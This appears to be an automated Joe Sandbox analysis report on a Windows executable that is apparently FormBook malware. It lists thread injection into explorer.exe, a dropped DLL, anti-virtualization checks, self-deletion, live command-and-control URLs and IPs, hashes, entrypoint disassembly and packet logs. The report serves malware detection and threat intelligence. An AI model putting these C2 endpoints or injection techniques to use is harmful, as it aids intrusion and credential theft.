Queues an APC in another process (thread injection) 15->73 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.drive16pay.art 202.165.66.108, 49863, 80 VPIS-APVADSManagedBusinessInternetServiceProviderMY Australia 18->35 37 www.financecreditpro.com 5.9.90.226, 49839, 80 HETZNER-ASDE Germany 18->37 39 13 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Performs DNS queries to domains with low reputation 18->51 22 WWAHost.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 59 Tries to detect virtualization through RDTSC time measurements 22->59 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DN_467842234567.exe64%ReversingLabsWin32.Trojan.Swotter
          DN_467842234567.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll11%ReversingLabsWin32.Trojan.InjectorX

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.1.DN_467842234567.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.DN_467842234567.exe.e920000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.DN_467842234567.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.2.WWAHost.exe.3d57968.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.DN_467842234567.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.0.DN_467842234567.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.DN_467842234567.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.WWAHost.exe.a398b0.0.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.drive16pay.art/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL000%Avira URL Cloudsafe
          http://www.2377k.com/r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL000%Avira URL Cloudsafe
          http://www.lottochain.bet/r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL000%Avira URL Cloudsafe
          www.bofight.store/r95e/0%Avira URL Cloudsafe
          http://www.nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL000%Avira URL Cloudsafe
          http://www.financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL000%Avira URL Cloudsafe
          http://www.uscryptomininglaws.com/r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL000%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.drive16pay.art
          		202.165.66.108
          		truetrue
            		unknown
            uscryptomininglaws.com
            		34.102.136.180
            		truefalse
              		unknown
              www.financecreditpro.com
              		5.9.90.226
              		truetrue
                		unknown
                www.2377k.com
                		172.67.148.98
                		truetrue
                  		unknown
                  td-balancer-euw2-6-109.wixdns.net
                  		35.246.6.109
                  		truefalse
                    		unknown
                    www.nurhalilah.xyz
                    		104.21.11.163
                    		truetrue
                      		unknown
                      www.healthcaresms.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.kxdrstone.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.21lawsofconfidence.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.lottochain.bet
                            		unknown
                            		unknowntrue
                              		unknown
                              www.byemreperde.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.portale-accessi-anomali.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.uscryptomininglaws.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.smpldebts.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.drive16pay.art/r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.2377k.com/r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.lottochain.bet/r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      www.bofight.store/r95e/true
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.nurhalilah.xyz/r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.financecreditpro.com/r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.uscryptomininglaws.com/r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00false
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nsis.sf.net/NSIS_ErrorDN_467842234567.exefalse
                                        		high
                                        http://nsis.sf.net/NSIS_ErrorErrorDN_467842234567.exefalse
                                          		high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.21.11.163
                                          		www.nurhalilah.xyzUnited States
                                          		13335CLOUDFLARENETUStrue
                                          35.246.6.109
                                          		td-balancer-euw2-6-109.wixdns.netUnited States
                                          		15169GOOGLEUSfalse
                                          34.102.136.180
                                          		uscryptomininglaws.comUnited States
                                          		15169GOOGLEUSfalse
                                          172.67.148.98
                                          		www.2377k.comUnited States
                                          		13335CLOUDFLARENETUStrue
                                          5.9.90.226
                                          		www.financecreditpro.comGermany
                                          		24940HETZNER-ASDEtrue
                                          202.165.66.108
                                          		www.drive16pay.artAustralia
                                          		18206VPIS-APVADSManagedBusinessInternetServiceProviderMYtrue

                                          General Information

                                          Joe Sandbox Version:33.0.0 White Diamond
                                          Analysis ID:491743
                                          Start date:27.09.2021
                                          Start time:21:04:20
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:DN_467842234567.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:18
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/2@13/6
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 23.1% (good quality ratio 20.5%)
                                          • Quality average: 73.9%
                                          • Quality standard deviation: 32.9%
                                          HCA Information:
                                          • Successful, ratio: 83%
                                          • Number of executed functions: 103
                                          • Number of non-executed functions: 57
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.82.209.183, 2.20.157.220, 20.50.102.62, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43
                                          • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491743/sample/DN_467842234567.exe

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          www.nurhalilah.xyzDN-32T56U8I90.exeGet hashmaliciousBrowse
                                          • 172.67.166.108

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          CLOUDFLARENETUSD.I. Pipes Fittings.docGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          2mdb3OG6FM.exeGet hashmaliciousBrowse
                                          • 104.23.98.190
                                          DHL AWB# 4AB19037XXX.pdf.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          fTset285bI.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          aQKifdER74.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          s9SWgUgyO5.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          Docusign_Signature_1019003.htmlGet hashmaliciousBrowse
                                          • 104.16.19.94
                                          GU#U00cdA DE CARGA...exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          TT09876545678T8R456.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          Original Shipping documents.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          Image-Scan-80195056703950029289.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          RHgAncmh0E.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          01_extracted.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          InvPixcareer.-5589234_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          INQUIRY LIST.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          qJvDfzBXbsGet hashmaliciousBrowse
                                          • 104.16.180.49
                                          YTHK21082400.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          CLOUDFLARENETUSD.I. Pipes Fittings.docGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          2mdb3OG6FM.exeGet hashmaliciousBrowse
                                          • 104.23.98.190
                                          DHL AWB# 4AB19037XXX.pdf.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          fTset285bI.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          aQKifdER74.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          s9SWgUgyO5.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          Docusign_Signature_1019003.htmlGet hashmaliciousBrowse
                                          • 104.16.19.94
                                          GU#U00cdA DE CARGA...exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          TT09876545678T8R456.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          Original Shipping documents.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          Image-Scan-80195056703950029289.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          RHgAncmh0E.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          01_extracted.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          InvPixcareer.-5589234_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          INQUIRY LIST.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          qJvDfzBXbsGet hashmaliciousBrowse
                                          • 104.16.180.49
                                          YTHK21082400.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                          • 162.159.129.233

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\heydlav1me3m3
                                          Process:C:\Users\user\Desktop\DN_467842234567.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):216352
                                          Entropy (8bit):7.988889824927144
                                          Encrypted:false
                                          SSDEEP:6144:B3LvyTtzd7TaYoyfuV6l1QOqvZV37EmPUxe:B3LKTtz5oyi2KZFXKe
                                          MD5:58C2415280597F09508AF99848706970
                                          SHA1:519D3C89A189C57CCF79D068668CCBF0D945D4AA
                                          SHA-256:1C1E3D64943CD74398E9AE298D957AF7C941FCD7161306D24FFD88A9F03A73F7
                                          SHA-512:A016852CB37C15558A4E1414E765B62719639CC466F22D697E8FBA339EAE58EC3C939C4AB3EBB00875B54CFB19A079074B67346C01968C6DBED949714FCB3E10
                                          Malicious:false
                                          Reputation:low
                                          Preview: Z+Y*5i.>.UDh....5.&......L...!e..%...Ub....W.eT..%h..fk..N....!..o..a;.}Q...G..b0.lz.I....@Z..$.....|V..>9.O.L......*..;.`.....#..0.R.gA."CS....d..P-Vm8.*.E..|......ll.ew.u.Keu.6..fo........%u.S.{e.8m.I..........F:3..MtJ..T.0...0C.04..w1.X.^..w..p.Yz'AFZi.>...<.t.YYh...l4.Zg.'..!e.w.%..Ub..t.W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]....h..6.....t?... ..%.S.{e.}m...5..k....F:3..M}.....0...0C.4.5w1.k.^s._..p.Y.'zFZi.>.w.<..YYh...l..Zg.'.i.!e..%...Ub....W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]..u.Keu.6...o.t...3f.%u.S.{e.}m...5...k....F:3..M}.....0...0C.4.5w1.k.^s._..p.Y.'zFZi.>.w.<..YYh...l..Zg.'.i.!e..%...Ub....W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]..u.Keu.6...o.t...3f.%u.S.{e.}m...5...k....F:3..M}.....0
                                          C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll
                                          Process:C:\Users\user\Desktop\DN_467842234567.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):16384
                                          Entropy (8bit):6.5327019634702514
                                          Encrypted:false
                                          SSDEEP:192:4ouT5wvAi3OL1PJuIJHSArHv6vQmgbehh8dgq47bmDQH4UJ58cHk2:4ouT7ZSav6KYmDncE2
                                          MD5:6B93D55CD940BABD5EAB05E0A8A2FEA7
                                          SHA1:E2FC9047947BDD96F92B8E1D103FC13FB606D540
                                          SHA-256:3EEFD1C7DAF2B08BC38159F216CD5E79CA1BDAF923EE6993EDDBC602E6B84E15
                                          SHA-512:070016B91BE674AD938CC407D045D1D175ACBEE61161EC63A994D84E74E72663AA6B1BC3E57843F6BEF5C13C26E066E245CCDDDC41FA198435DED18CAA3A2DD8
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Reputation:low
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.Q4=.?g=.?g=.?g.3.g<.?gN.9f9.?gN.>f,.?g=.>g..?g..;f<.?g..?f<.?g...g<.?g..=f<.?gRich=.?g........PE..L...m Qa...........!.........$...............0............................................@..........................B..H....D.......p..........................d....B...............................................@...............................text...*........................... ..`.bss.........0...........................rdata.......@......................@..@.data........P.......&..............@....rsrc........p.......<..............@..@.reloc..d............>..............@..B................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.907089954961491
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:DN_467842234567.exe
                                          File size:259211
                                          MD5:c16013ea29f9dd1525dcb65c2184784e
                                          SHA1:5afd533f29573050734e428f9f8c9ba08c79546a
                                          SHA256:df05d916a02c09e1dba0df0841f93697e407a334ce8d2371dfe8befd909d8a43
                                          SHA512:87c9e01aac687d2c675cb281592c930ce7bfefebc4eecde4135834bf896265d0238f9afc98726214fc30ef19c2528740aadf12df00e7cb44c469e56d5e9eefca
                                          SSDEEP:6144:F8LxBsFqxTsbu0sRCwePkl1QOOMKgUx6N:/slG1465p+
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x40312a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b76363e9cb88bf9390860da8e50999d2

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+20h], ebx
                                          mov dword ptr [esp+14h], 00409168h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov byte ptr [esp+18h], 00000020h
                                          call dword ptr [004070B0h]
                                          call dword ptr [004070ACh]
                                          cmp ax, 00000006h
                                          je 00007F467CB36D43h
                                          push ebx
                                          call 00007F467CB39B24h
                                          cmp eax, ebx
                                          je 00007F467CB36D39h
                                          push 00000C00h
                                          call eax
                                          mov esi, 00407280h
                                          push esi
                                          call 00007F467CB39AA0h
                                          push esi
                                          call dword ptr [00407108h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F467CB36D1Dh
                                          push 0000000Dh
                                          call 00007F467CB39AF8h
                                          push 0000000Bh
                                          call 00007F467CB39AF1h
                                          mov dword ptr [0042EC24h], eax
                                          call dword ptr [00407038h]
                                          push ebx
                                          call dword ptr [0040726Ch]
                                          mov dword ptr [0042ECD8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 00429058h
                                          call dword ptr [0040715Ch]
                                          push 0040915Ch
                                          push 0042E420h
                                          call 00007F467CB39724h
                                          call dword ptr [0040710Ch]
                                          mov ebp, 00434000h
                                          push eax
                                          push ebp
                                          call 00007F467CB39712h
                                          push ebx
                                          call dword ptr [00407144h]

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x9e0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5e660x6000False0.670572916667data6.44065573436IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x12a20x1400False0.4455078125data5.0583287871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x25d180x600False0.458984375data4.18773476617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x370000x9e00xa00False0.45390625data4.4968702957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x371900x2e8dataEnglishUnited States
                                          RT_DIALOG0x374780x100dataEnglishUnited States
                                          RT_DIALOG0x375780x11cdataEnglishUnited States
                                          RT_DIALOG0x376980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                                          RT_MANIFEST0x377100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                          USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                          ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          09/27/21-21:06:35.892571TCP1201ATTACK-RESPONSES 403 Forbidden804982934.102.136.180192.168.2.4
                                          09/27/21-21:06:40.999753TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.45.9.90.226
                                          09/27/21-21:06:40.999753TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.45.9.90.226
                                          09/27/21-21:06:40.999753TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.45.9.90.226
                                          09/27/21-21:07:01.684685TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.435.246.6.109
                                          09/27/21-21:07:01.684685TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.435.246.6.109
                                          09/27/21-21:07:01.684685TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.435.246.6.109
                                          09/27/21-21:07:17.348883UDP254DNS SPOOF query response with TTL of 1 min. and no authority53624208.8.8.8192.168.2.4

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 21:06:30.553550959 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:30.573894024 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.574076891 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:30.575259924 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:30.595679045 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.639205933 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.639230967 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.639241934 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.639520884 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:30.639628887 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:35.700731993 CEST4982980192.168.2.434.102.136.180
